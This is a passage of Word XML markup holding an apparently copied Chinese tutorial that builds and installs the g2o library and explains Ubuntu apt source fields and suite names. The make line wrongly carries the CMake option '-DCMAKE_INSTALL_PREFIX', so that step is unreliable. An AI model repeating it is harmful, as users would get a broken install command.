          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> g2o</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A081AF" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="DD4A68"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>mkdir</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> build </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="9A6E3A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="DD4A68"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509BE925" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">cmake </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084C10BA" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="DD4A68"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> -j8 -DCMAKE_INSTALL_PREFIX</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="9A6E3A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/usr/local/g2o/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692A72B4" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="DD4A68"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="DD4A68"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="DD4A68"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7F5A01" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif" w:hint="eastAsia"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CACA071" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif" w:hint="eastAsia"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>COPY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65940536" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif" w:hint="eastAsia"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>AddressType</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>表示访问地址类型，常用类型有：</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>ftp</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>cdrom</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>等；</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>目前一般镜像源支持前两个，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>ftp</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>少部分支持。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A98D39D" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif" w:hint="eastAsia"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Distribution</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>表示</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>的各个发行版本，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>dapper</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>feisty</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>本样例中</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>jammy</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>代表</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Ubuntu 22.04 LTS</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>版本的代号</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>-security</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>（安全相关）、</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>-proposed</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>（测试版）、</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>-updates</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>（更新相关）、</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>-backports</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>（向后移植</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>兼容）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FB168F" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif" w:hint="eastAsia"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
